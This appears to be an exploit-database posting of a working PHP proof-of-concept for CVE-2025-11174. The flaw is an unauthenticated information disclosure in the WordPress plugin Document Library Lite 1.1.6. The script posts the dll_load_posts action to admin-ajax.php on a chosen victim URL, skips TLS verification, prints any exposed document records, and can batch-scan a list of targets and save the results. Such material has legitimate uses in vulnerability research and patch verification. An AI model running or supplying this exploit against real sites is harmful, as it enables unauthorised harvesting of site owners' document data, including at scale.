Share
## https://sploitus.com/exploit?id=PACKETSTORM:216390
=============================================================================================================================================
    | # Title     : WordPress Document Library Lite 1.1.6 Information Disclosure                                                                |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits)                                                            |
    | # Vendor    : https://wordpress.org/plugins/document-library-lite/                                                                        |
    =============================================================================================================================================
    
    [+] References : https://packetstorm.news/files/id/211137/ &	CVE-2025-11174
    
    [+] Summary : The WordPress plugin β€œDocument Library Lite” fails to restrict access to internal AJAX API endpoint allowing unauthenticated attackers to fetch document records exposing sensitive metadata.
    
    [+]  POC :   * Usage: php poc.php https://victim.com
                          php poc.php https://victim.com output.json
    
    
    <?php
    /**
     * CVE-2025-11174 WordPress PoC
     * Fixed Version By Indoushka
     */
    
    class Colors {
        const R="\033[0;31m"; const G="\033[0;32m"; const Y="\033[1;33m";
        const B="\033[0;34m"; const M="\033[0;35m"; const C="\033[0;36m";
        const N="\033[0m";
    }
    
    function banner() {
    echo Colors::R."
     β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ•—   β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—  β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•—   β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•—  β–ˆβ–ˆβ•—β–ˆβ–ˆβ•—  β–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— 
     β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ•—  β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘   β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—
     β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β–ˆβ–ˆβ•— β–ˆβ–ˆβ•‘β–ˆβ–ˆ   β–ˆβ•”β•β–ˆβ–ˆβ•‘   β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘   β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β• β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘
     β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘   β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘   β–ˆβ–ˆβ•‘β•šβ•β•β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•— β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•‘
     β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β•šβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘
     β•šβ•β•β•šβ•β•  β•šβ•β•β•β•β•šβ•β•β•β•β•β•  β•šβ•β•β•β•β•β•  β•šβ•β•β•β•β•β• β•šβ•β•β•β•β•β•β•β•šβ•β•  β•šβ•β•β•šβ•β•  β•šβ•β•β•šβ•β•  β•šβ•β• 
    ".Colors::N."
    CVE-2025-11174 β€” Document Library Lite
    Unauthenticated Information Disclosure PoC
    ==========================================
    
    ";
    }
    
    function normalize($u){
        if(!preg_match('#^https?://#i',$u)) $u="https://".$u;
        return rtrim($u,"/");
    }
    
    function poc($t,$v=false){
        $t=normalize($t);
        $u=$t."/wp-admin/admin-ajax.php";
    
        echo Colors::G."[+] Target: ".Colors::N.$t.PHP_EOL;
        echo "    Endpoint: $u".PHP_EOL.PHP_EOL;
    
        $h=[
            "User-Agent: CVE-2025-11174-Proof",
            "Content-Type: application/x-www-form-urlencoded"
        ];
        $p="action=dll_load_posts";
    
        $c=curl_init();
        curl_setopt_array($c,[
            CURLOPT_URL=>$u,
            CURLOPT_POST=>true,
            CURLOPT_POSTFIELDS=>$p,
            CURLOPT_HTTPHEADER=>$h,
            CURLOPT_RETURNTRANSFER=>true,
            CURLOPT_TIMEOUT=>10,
            CURLOPT_FOLLOWLOCATION=>true,
            CURLOPT_SSL_VERIFYPEER=>false
        ]);
        $r=curl_exec($c);
        $s=curl_getinfo($c,CURLINFO_HTTP_CODE);
        $e=curl_error($c);
        curl_close($c);
    
        echo Colors::G."[+] HTTP: ".Colors::N.$s.PHP_EOL.PHP_EOL;
    
        if($e){
            echo Colors::R."[!] CURL ERROR: $e".Colors::N.PHP_EOL;
            return ["vuln"=>false];
        }
    
        if($s!=200){
            echo Colors::Y."[!] Unexpected status".Colors::N.PHP_EOL;
            return ["vuln"=>false];
        }
    
        $j=json_decode($r,true);
        if(json_last_error()!==JSON_ERROR_NONE){
            echo Colors::G."[+] No JSON returned β€” not vulnerable".Colors::N.PHP_EOL;
            return ["vuln"=>false];
        }
    
        if(isset($j["data"]) || isset($j["recordsTotal"])){
            echo Colors::R."[!!!] VULNERABLE".Colors::N.PHP_EOL.PHP_EOL;
            echo Colors::G."[+] Retrieved Data:".Colors::N.PHP_EOL;
            echo json_encode($j,JSON_PRETTY_PRINT).PHP_EOL;
    
            return ["vuln"=>true,"data"=>$j];
        }
    
        echo Colors::G."[+] Not vulnerable".Colors::N.PHP_EOL;
        if($v){
            echo Colors::Y."[Verbose] Data:".Colors::N.PHP_EOL;
            echo json_encode($j,JSON_PRETTY_PRINT).PHP_EOL;
        }
        return ["vuln"=>false,"data"=>$j];
    }
    
    function isPCNTL(){
        return function_exists("pcntl_signal") && function_exists("pcntl_async_signals");
    }
    
    function main(){
        global $argv;
        $opts=getopt("vho:",["verbose","help","output:","batch","no-banner"]);
        if(!isset($opts["no-banner"])) banner();
    
        if(isset($opts["h"])||isset($opts["help"])){
            echo "Usage: php ".basename($argv[0])." [OPTIONS] TARGET\n\n";
            exit;
        }
    
        $verbose=(isset($opts["v"])||isset($opts["verbose"]));
    
        // Last standalone argument (target)
        $args=$argv;
        array_shift($args);
        foreach($args as $a){
            if($a[0]!="-"){$target=$a;break;}
        }
        if(empty($target)){
            echo Colors::R."[!] ERROR: No Target Provided".Colors::N.PHP_EOL;
            exit(1);
        }
    
        if(isset($opts["batch"])){
            $file=$target;
            if(!file_exists($file)){
                echo Colors::R."[!] ERROR: Batch file not found: $file".Colors::N.PHP_EOL;
                exit(1);
            }
            $list=file($file,FILE_IGNORE_NEW_LINES|FILE_SKIP_EMPTY_LINES);
            echo Colors::G."[+] Loaded ".count($list)." targets".Colors::N.PHP_EOL.PHP_EOL;
    
            $res=[];
            foreach($list as $x){
                echo Colors::C."[~] Testing $x".Colors::N.PHP_EOL;
                $r=poc($x,$verbose);
                $r["target"]=$x;
                $res[]=$r;
                echo PHP_EOL;
            }
    
            if(isset($opts["o"])||isset($opts["output"])){
                $o=$opts["o"]??$opts["output"];
                file_put_contents($o,json_encode($res,JSON_PRETTY_PRINT));
                echo Colors::G."[+] Saved to: $o".Colors::N.PHP_EOL;
            }
            exit;
        }
    
        $r=poc($target,$verbose);
        if(isset($opts["o"])||isset($opts["output"])){
            $o=$opts["o"]??$opts["output"];
            file_put_contents($o,json_encode($r,JSON_PRETTY_PRINT));
            echo Colors::G."[+] Saved to: $o".Colors::N.PHP_EOL;
        }
    
        exit($r["vuln"]?0:1);
    }
    
    if(isPCNTL()){
        pcntl_async_signals(true);
        pcntl_signal(SIGINT,function(){
            echo PHP_EOL.Colors::Y."[!] Interrupted".Colors::N.PHP_EOL;
            exit(130);
        });
    }
    
    main();
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================